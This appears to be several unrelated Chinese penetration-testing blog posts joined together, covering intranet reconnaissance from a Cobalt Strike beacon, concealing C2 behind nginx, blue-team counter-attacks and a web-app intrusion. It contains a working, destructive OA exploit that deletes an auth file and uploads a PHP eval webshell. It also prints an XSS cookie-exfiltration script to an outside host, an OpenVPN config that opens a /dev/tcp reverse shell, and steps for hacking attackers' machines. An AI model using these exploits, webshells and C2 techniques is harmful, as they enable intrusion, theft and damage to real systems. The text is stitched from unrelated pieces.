ANONYMOUS 发布的文章

0x01 实战场景说明

实战中可能会经常遇到这样的情况,比如,前期在外网打点过程中肯定会搜集到非常多的目标敏感资产,包括跑在各种子域上的各类敏感Web业务系统,典型的,如, VPN, MAIL, OA, 运维管理平台, 财务系统, HR系统, SSO, 客户订单系统 , Citrix, 监控系统, 堡垒机 [这种一般也不大可能会直接把它暴露在外网,但不代表没有],各类EDR Web主控端, 防火墙/路由/视频监控设备的web管理端, 各种其它内部系统 等等等...ok, 问题来了,当我们费尽千辛万苦顶到内网之后,该怎么去快速精准定位刚刚在外网看到的这些敏感资产所对应的内网位置呢

在此之前有必要简要说明下为什么要去做这种定位,一方面,一般授权的渗透都是有明确目的的,比如,需要拿到目标内网的某某核心业务系统权限,某某集中控制系统权限,某某数据 等等等...要拿到这些东西的前提是,得先搞清楚这些资产都放在了什么地方,换句话说,万一后面从其它地方搞到了密码,总得有个入口试

另外,知道了这些资产的大概位置,对下一步具体该怎么更高效的搞也是有一定参考意义的,总的来讲,知道这些以后会让整个后渗透过程变得的更有针对性,也不至于搞着搞着就迷失放飞自我了[尤其当内网规模特别大的时候]

另一方面,则是考虑到后期把整个内网搞定之后,为了能挑个更合适的位置给自己布口子 [此处的口子,可以是个账号密码,也可以是个webshell,或者系统后门,甚至是人为构造的漏洞,并不局限],此处会介绍三种比较常用的内外网资产对应关系定位方式,其实非常简单,如下:

0x02 实操过程

第一种,就是把前期在外网搜集到的目标子域 [从外网搜集到的子域可能并不会非常多列表整理好,拿到内网循环ping,然后把解析到的ip截下来

1.png

如下便可清晰的看到各个资产所对应的具体内网ip,从中也可顺便发现一些通过其它手段可能并不太好发现的内网段,在后续渗透中如果遇到这些ip 着重下关注即可

for /f "delims=" %i in (host.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> C:/users/public/out.txt

2.png

第二种,dns 暴力枚举

通过第一种方式,确实可以定位到一些资产,但那个子域列表毕竟是从外网抓取的,漏一些在所难免,所以还需要在内网再进行一次dns枚举,内网抓到的结果肯定要比外网多的多,但前提是得先有个内网的dns ip, 怎么在目标找内网dns,方式无非两种,第一种,假设当前已控机在域内,系统网络配置里就有主备dns的ip,后续直接指明用这个ip来枚举即可

beacon> shell ipconfig /all

3.png

另一种,假设当前已控机不在域内,则可以直接扫下内网的53 [tcp & udp 53同时开的一般都是] 端口,或者看下当前机器的dns缓存,通常也是可以找到的。

beacon> portscan 192.168.137.0/24 53 none 256
beacon> shell ipconfig /displaydns

4.png

有了DNS ip,接着就可以拿着这些ip进行暴力枚举 [关于dns枚举的原理非常简单,不再废话,不清楚的弟兄请稍后自行谷歌,能找到多少,看字典],枚举完成后会自动存到csv,如下的工具是基于go的 [个人对于工具的原则,如果不是奔着纯练,学习别人代码或者商业化目的去的,建议能用开源的就用开源的,后面基于之上进行二次开发即可,没有太大必要所有事情都一定从0到1的重复劳动,不如把时间留在更有价值的地方,去创造而非模仿]

https://github.com/Q2h1Cg/dnsbrute (注: 工具有用到Crypt 360会杀)

down下来自行编译即可,关于go多说一点,编译后体积过大,实战中不好上传,都是没办法的事,虽然可以通过调参,upx压缩来减小体积,但upx [亦可用其他压缩壳代替] 这种360会杀,不过,我们可以自己用其他语言实现然后合到cs中,难度不大

beacon> shell dnsbrute.exe -domain tagetDomain.com -dict SubDomain.txt -rate 1000 -retry 1 -server 192.168.137.11:53
beacon> shell tasklist | findstr "dnsbrute.exe"

5.png

第三种,内网批量抓取 Web Title & Header

通过把上面两种方式获取到的结果汇总去重,其实已经能定位到一部分资产了,但这显然还是不够清晰,有了上面那些现在也只能告诉我们大概哪个资产域名对应的是哪个内网ip,其实也并不知道这个ip现在到底还存不存活,上面跑的什么服务,什么业务 等等等...

所以,现在还需要再针对这些ip的Web Title & header集中进行一次批量获取,当然,这只是针对Web的,至于其它的各类服务端口banner,后续会单独说明,有了title和响应banner,才好确定下一步哪些是可以优先搞的

另外,你也可以拿着在内网抓到的某些title去外网的各种引擎上搜[ fofa,shodan,google,bing...],以此来大致判断其所对应的外网位置,方便后期找个更合适的点留口子,关于内网抓title,此处已经写好了针对Windows 和 linux扫描脚本,非常简单,只是简单配合curl 实现的一个粗糙的端口扫描功能,不要问我为什么用批处理和shell,简单,快[两分钟实现],系统内置方便,非常适合专门用来写些简单的demo,前提是你的cmd.exe没有被各种杀软强奸,如下实际扫描效果。

Win下:

6.png

Linux下

7.png

说到内网扫描,多提一句,个人非常不建议,同时针对一个ip扫多个端口,如果你不想被封的那么快 [ 实际扫的时候想完全不被对方看到,其实也不太现实,除非你运气足够好,对方正好把你的流量全都漏了,只是到不到阈值,会不会触发报警的问题 ,另外,顺带提下痕迹清理的事情,其实很多东西是不太好清掉的(可能也只是需要更多的时间) ,如果别人真想查,还是能查到一些东西,考验的更多的是海量数据分析处理精度的问题,先不说各种日志,比如流量,只要不是全程加密,你传的工具,执行的命令...在里面都一清二楚(没错,如果可以的话,你是可以尝试利用这种方式直接从流量里收割别人的好工具的),内网一堆探针和出口镜像是很难保证完全的隐蔽,有些设备还是可以的,更多还在于实际用它的人 ],更建议同时针对特定的ip列表只扫一个端口,现实会告诉你,这种方式绝对要比前面那种好,虽然站在检测的角度,两者其实并没有太大的区别。

这里试着在Windows下使用nginx反向代理来隐藏C2服务器,降低性能消耗,做一些简单的流量处理,进行一些实践测试。

1.端口配置

然后就是Cobaltstrike的端口配置,配置c2端口为nginx的端口(代理),Bind端口为实际c2监听端口:

1.png

2.启动nginx

下载nginx,命令行下使用nginx -c conf/nginx.conf执行后,修改配置文件,再使用nginx –s reload进行重载使配置生效,访问测试:

2.png

3.配置Nginx

配置nginx,主要就是要把信标流量给cs服务器,这里由于我们使用

jquery-c2.4.0.profile

https://github.com/rsmudge/Malleable-C2-Profiles

来进行流量伪装,

可以在这个配置文件中看到对http-get的配置信息,所以payload会请求伪装的uri来进行通信:

3.png

所以在nginx中配置,匹配jquery开头的url进行反向代理,匹配成功后转发给我们的cs 8089:

location ~*/jquery {

                 #start with jquery

                 proxy_pass  http://127.0.0.1:8089;

    }

先访问一下看看:

4.png

好了,测试一下上线后发现外部地址显示为127.0.0.1:

5.png

这里需要给nginx配置一下源IP,加入配置项:

proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

配置如下:

location ~*/jquery {

                 #start with jquery

                 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

                 proxy_pass  http://127.0.0.1:8089;

    }

         

           location / {

         proxy_pass  http://www.qq.com/;

    }

配置好后还需要到profile中设置真实IP获取,这里是用的 X-Forwarded-For,可以在profile中看到设置:

6.png

然后再进行测试,命令执行正常:

7.png

4.配置防火墙

很关键的一步,配置防火墙,拦截外部访问~:

8.png

成功:

9.png

端口开放情况:

80/tcp    open  http (nginx)
3389/tcp  open  ms-wbt-server (远程桌面)
5985/tcp  open wsman   (防火墙拦截)
33890/tcp  open unknown  (CS服务端)
33891/tcp  open unknown  (CS https监听器)
47001/tcp  open winrm (禁用Windows Remote Management)

看到漏洞的作者刚放出了EXP,目前应该还是0day。

Exp亲测可用:

1.png

2.png

target="http://127.0.0.1:1234/"
payload="<?php eval($_POST['hahaha']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[-]Failed to deleted auth.inc.php")
exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('deconf.php', payload)}
requests.post(url=url,files=files)
url=target+"/_deconf.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[+]Filed Uploaded Successfully")
print("[+]URL:",url)
else:
print("[-]Failed to upload file")

前言

网络安全攻防演习在国内已经逐渐常态化,从行业、区域(省份、地市)到部级...
2020年1月份开始到现在可以说基本上每个月都有1-3场HW,红与蓝的对抗从未停息。

红队的攻击技巧可以无穷无尽(扫描器、社工、0day、近源...),但是对于蓝队防守来说除了演习中常规的封IP、下线业务、看日志分析流量等“纯防守”操作以外,似乎实在是没有什么其他的防御手段了。

笔者在参与的几场攻防演习项目中担任“蓝队防守”角色,就发现了这一缺陷,似乎安全防御基础较弱的厂商再怎么充足的进行演习前准备,都只有乖乖的等待被“收割”。

转换一个思维,化被动为主动,尝试用“攻击”思路代入“防守”中,对“红队”进行反向捕获(反制)。

本文将总结案例“反制”手段,文中不足之处还望各位斧正。

反制手段

蜜罐篇

蜜罐设备

大部分厂商为了争取得到一些分数,都会采购/借用一些厂商的蜜罐设备,但蜜罐也分两类:传统、现代,两者从本质上还是有一定区别的,这里我简单说一下自己的理解。

传统蜜罐:蜜罐技术本质上是一种对攻击方进行欺骗的技术,通过布置一些作为诱饵的主机、网络服务或者信息,诱使攻击方对它们实施攻击,从而可以对攻击行为进行捕获和分析,了解攻击方所使用的工具与方法,推测攻击意图和动机,能够让防御方清晰地了解他们所面对的安全威胁,并通过技术和管理手段来增强实际系统的防御能力。

现代蜜罐:除了捕获分析攻击行为外,各类安全厂商在蜜罐产品中加入了“攻击者画像”这一功能作为“卖点”,而本质上攻击者画像是将第三方厂商漏洞转为画像探针,利用第三方厂商漏洞获取攻击者所在此类厂商网站业务上的个人信息,此类漏洞多半为前端类漏洞,例如:JSONP、XSS...除此之外还有网站伪造、自动投放蜜标等等众多丰富的功能。

所以传统蜜罐厂商在这一块的被“需要”不大,而现代蜜罐厂商在这一块往往有需要性很多,就冲“攻击者画像”这一方面在演习过程中就可以为防守方加分。

蜜罐的反制

现代化蜜罐都做了哪些反制的操作呢?

可克隆相关系统页面,伪装“漏洞”系统
互联网端投饵,一般会在Github、Gitee、Coding上投放蜜标(有可能是个单独的网站地址、也有可能是个密码本引诱中招)
利用JSONP、XSS、CSRF等前端类漏洞获取访问蜜标的攻击者网络身份(网络画像)
这样其实一条捕获链就出现了(仅仅是举例,其实更多的是对方在做信息收集的时候探测到了此端口):

1.png

蜜罐的一些功能细节不过多赘述,比如利用JavaScript辨别人机、Cookie中种入ID防止切换IP之类的...如有兴趣想深入了解的朋友可以去相关厂商官网下载白皮书观看。

注:在实战演习过程中,仍然有许多攻击者中招,蜜罐会存储身份数据,并且会回传至厂商进行存储。

场景篇

主动攻击“攻击IP”

防守日常就是看流量、分析流量,其中大部分都为扫描器流量,由于一般扫描器都会部署在VPS上,因此我们可以结合流量监测平台反向扫描。

2.png

导出演习期间攻击IP列表,对IP进行端口扫描,从Web打入攻击IP机器内部。

3.png

发现了一堆攻击IP机器上Web服务的漏洞:SQL注入、弱口令...拿下了一堆机器,也发现了大部分都是“被控主机”,而非购买的VPS,上面也大多是一些正常业务、非法业务在运转。

4.png

除此之外,我们对所拿下的主机进行信息收集,发现了一个有意思的点,大部分机器为WAMP(Windows + Apache + Mysql + PHP),而根目录都存在着一个文件images.php

5.png

这是一个PHP脚本后门,我们通过分析该PHP文件又拿下数十台机器,对每台机器进行日志收集,分析IP关联性...整理报告上交裁判组判定。

邮件钓鱼反制

安全防护基础较好的厂商,一般来说除了出动0day,物理近源渗透以外,最常见的就是邮件钓鱼了,在厂商收到邮件钓鱼的情况下,我们可以采取化被动为主动的方式,假装咬钩,实际上诱导攻击者进入蜜网。

北京时间 2019 年 5 月 15 日微软发布安全补丁修复了 CVE 编号为 CVE-2019-0708 的 Windows 远程桌面服务(RDP)远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。

受影响操作系统版本:
| Windows 7
| Windows Server 2008 R2
| Windows Server 2008
| Windows Server 2003
| Windows XP

由于该漏洞与去年的“Wannacry”勒索病毒具有相同等级的危害,由总行信息科技部研究决定,先推行紧急漏洞加固补丁,确保业务网、办公网全部修补漏洞,详情请阅读加固手册。

加固补丁程序解压密码:xxxx

xx信息科技部
xxxxx
xxx年xx月xx日

在某次演习期间,我们防守的客户单位就收到了钓鱼邮件,庆幸的是客户总体安全意识很强,加上有邮件沙箱的加持,并没有实际人员中招,而我们将计就计,部署一套虚假的内网环境,伪造钓鱼邮件中招假象,中招人员画像和机器环境编排:

名字:许晋 (jinxu)
身份:巡检职员
平时上机内容:看视频、打游戏、巡检

系统软件:Office三件套, 搜狗输入法, QQ, 微信, Xmind, 谷歌浏览器, Winrar, 迅雷, 百度网盘, Everything, 爱奇艺, 腾讯视频, QQ音乐, 网易云音乐, FastStone Capture....

系统环境:除了部署一些常见的系统软件,我们还要创建一系列工作文档(手工伪造、由客户提供非敏感公开数...),并在众多的工作文档中携带了我们部署的免杀后门(伪装成VPN安装包或办公软件)。

目的:点开钓鱼邮件的附件,假装中招后,让攻击者在翻当前PC机器的时候寻找到我们投下的假密码本,并结合VPN安装包,使得攻击者下载VPN安装包并进行安装,从而进行反向控制。

其中具体细节不过多赘述,套路都一样,在多次演习中都成功的反制到了攻击队的VPS,甚至在演习中我们拿下了攻击队的终端PC...

盲打攻击反制

盲打攻击算是在演习中比较不常见的了,因为其效率不高,没办法直接的直控权限,但在攻击方穷途末路的时候往往也会选择使用盲打漏洞的方式来获取权限进而深入,比较常见的就属于盲打XSS了。

6.png

一般盲打XSS都具备一个数据回传接口(攻击者需要接收Cookie之类的数据),接口在JavaScript代码中是可以寻找到的,我们可以利用数据回传接口做2件事情:

1.打脏数据回传给XSS平台(捣乱)
2.打虚假数据回传给XSS平台(诱导)

通常选择第二种方式更有意义,当然实在不行的情况下我们还是可以选择捣乱的...

首先,我们获取到了XSS盲打的代码:

'"><sCRiPt sRC=https://XXXX/shX36></sCrIpT>

跟进SRC属性对应值(地址),获得如下JavaScript代码:

(function(){(new Image()).src='https://XXXX/xss.php?do=api&id=shX36&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();if(''==1){keep=new Image();keep.src='https://XXXX/xss.php?do=keepsession&id=shX36&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

通过该段代码我们可以知道数据都回传到了这个接口上:

https://XXXX/xss.php?do=api&id=shX36&location=地址&toplocation=地址&cookie=Cookie信息&opener=

我们制定了一个计划:发送假数据前往攻击者所使用的XSS信息接收平台,诱导攻击者进入蜜罐。

资源准备:公网域名解析蜜罐地址(需要客户网络安全部门具备一定的权利),蜜罐(需要具备蜜罐产品)伪造假后台,并部署虚假准入客户端下载;(【细节】当攻击者Cookie伪造进后台时会提示:当前登录IP不在准入名单)

7.png

万事俱备只欠东风,对应参数传入虚假诱导数据(Location地址为查看留言信息的地址,Toplocation为引用该界面的地址,将用户名、密码写入到Cookie中配合“准入客户端”的诱导攻击)发送过去,等待攻击队上钩。

8.png

技巧篇

虚假备份文件

配合蜜罐部署虚假漏洞,例如备份文件(WWW.rar)配合CVE-2018-20250漏洞。

参考:https://github.com/WyAtu/CVE-2018-20250

OpenVPN配置后门

OpenVPN配置文件(OVPN文件,是提供给OpenVPN客户端或服务器的配置文件)是可以修改并加入命令的。

OVPN文件最简单的形式如下:

remote 192.168.31.137
ifconfig 10.200.0.2 10.200.0.1
dev tun

以上文件表示,客户端会以开放的,不用身份验证或加密方式去连接IP为192.168.31.137的远程服务,在此过程中,会建立一种名为tun的路由模式,用它来在系统不同客户端间执行点对点协议,例如,这里的tun路由模式下,tun客户端为10.200.0.2,tun服务端为10.200.0.1,也就是本地的tun设备地址。这里的三行OVPN配置文件只是一个简单的示例,真正应用环境中的OVPN文件随便都是数百行,其中包含了很多复杂的功能配置。

OpenVPN 配置功能的 up 命令可以使得添加配置文件后执行我们所想让其执行的命令,官方文档中有明:https://openvpn.net/community-resources/reference-manual-for-openvpn-2-0/

成功启用 TUN/TAP 模式后的 cmd 命令。该cmd命令中包含了一个脚本程序执行路径和可选的多个执行参数。这种执行路径和参数可由单引号或双引号,或者是反斜杠来强调,中间用空格区分。up命令可用于指定路由,这种模式下,发往VPN另一端专用子网的IP流量会被路由到隧道中去。

本质上,up命令会执行任何你指向的脚本程序。如果受害者使用的是支持/dev/tcp的Bash命令版本,那么在受害者系统上创建一个反弹控制 shell 轻而易举。就如以下OVPN文件中就可创建一个连接到 192.168.31.138:9090 的反弹shell。

remote 192.168.31.137
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.31.138/9090 0<&1 2>&1&'"

9.png

需要注意的是,up 命令需要成功连接主机才会执行,也就是说192.168.31.137需要真实存在并可以连接。

兵器漏洞

可以尝试挖掘蚁剑、冰蝎、菜刀、BurpSuite、SQLmap、AWVS的0day漏洞(需要一定的技术水平),或利用历史漏洞部署相关环境进行反打,例如蚁剑:https://gitee.com/mirrors/antSword/blob/master/CHANGELOG.md

历史版本中出现诸多XSS漏洞->RCE:

10.png

文末

只要思维活跃,枯燥无味的一件事情也可以变得生动有趣,生活如此,工作亦如此。

蓝队反制,需要具备这几个条件才能淋漓尽至的挥洒出来:

1.客户安全相关部门的权力要高
2.以自家厂商为主导的防守项目
3.最好具备现成的现代蜜罐产品

未来,攻防对抗演习不仅仅是前几年所展示的那样:蓝队只要知道防守手段;而趋势将会慢慢的偏向于真正的攻防,蓝队不仅要会基本的防守手段,还要具备强悍的对抗能力,与红队进行对抗,这对蓝队成员的攻防技术水平也是一种更高的考验。

最后的最后,HACK THE WORLD - TO DO IT.

Reference

对某攻击队的Webshell进行分析 - https://gh0st.cn/archives/2019-08-21/1
从OpenVPN配置文件中创建反弹Shell实现用户系统控制 - https://www.freebuf.com/articles/terminal/175862.html

0x00 前言

本次测试是授权测试,涉及不到什么知识点,表哥轻点喷!!(手动狗头)

大概流程:

  1. 后台登录可爆破密码,得到一个普通权限的账户密码
  2. phpinfo页面 发现存在cgi解析漏洞
  3. 通过2种日志文件下载造成信息泄露,github找到源码
  4. 查看源码,得到更多的访问路径
  5. 使用普通账户未授权访问来添加管理员账户
  6. 登录管理员账户,logo上传图片马配合解析漏洞拿到shell。

0x01 爆破后台目录扫描

首先随意输入一个用户名admin, 提示用户名不存在,这儿就可以先爆破用户名

1.png

burp的图我就不上了,最后经过爆破得到了一个 普通用户权限的账户密码: :* (打码)

成功登录上

0x02 尝试文件上传

没啥其他的敏感文件泄露,就一个phpinfo,当我们看到cgi.fix_pathinfo参数为1,好咧 有解析漏洞了,所以我们现在只需要找到一个能够上传图片马的地方,就可以getshell了。

2.png

在后台找到一个地方可以上传文件,尝试上传普通的文件,可以疑似可以传上去,但是没回显的路径,尝试爆破路径和查看网站存在的图片右键打开链接来查看图片路径也没找到我们的图片不得不放弃。

3.png

在后台的功能点找了很久,最后点到一个功能板块,爆出SQL错误,柳暗花明又一村???咪?结果百度了一下,是在逗我玩。这不是报错语句

4.png

第二处文件上传:

在商城管理->添加商品的地方,可以上传产品图片,通过bp抓包,得到的回显信息 提示upload路径不存在 。。 我上传个锤子,图找不到了。

0x03 日志泄露找到源码

3.1 home日志

在坚持了一天找后台文件上传和找SQL注入后放弃了,结果有表哥提醒说tp框架你试试日志泄露,好吧,那就一个个去看,日志的路径组成是这样的
<domain>/<应用名称>/Runtime/Logs/<模块名>/<日期>.log 如果我们想要查看2020年7.1号的日志就是这样的:
http://ip/Application/Runtime/Logs/Home/20_07_01.log

5.png

看了也就大概5个月的日志,一个敏感信息也没看到

3.2 admin日志

经过尝试这个站还有一个admin目录下的日志泄露,http://ip/Application/Runtime/Logs/admin/20_07_01.log
这个时候就可以看到一些敏感路径了

6.png

7.png

mysql查询语句看得到,这又得到了一个后台账户密码,不过这个密码md5没解出来

8.png

最后呢,又找到了一些敏感路径,hm_ucenter 等等

9.png

一般自己有个习惯都要去github上找找源码,结果还真找到了,经过核实,路径确实一摸一样

10.png

然后将源码下载下来,发现还有还有个adminsystem目录,下面还有很多路径

11.png

经测试,我们当前用户的菜单栏 只有寥寥几个功能,下图这是普通用户菜单栏

12.png

而我们直接访问刚刚源码泄露的管理员菜单栏地址,所以是存在未授权访问

13.png

最后我们直接添加了一个管理员账户

14.png

然后注销普通用户,登录新建的管理员账户密码,无敌啊! 菜单栏多了起来! 后面通过网站管理设置 更换了logo ,, 采用的是冰蝎的马(因为有阿里云waf), copy 图片马的操作,得到了一个图片马,最后配合解析漏洞 终于getshell

15.png

16.png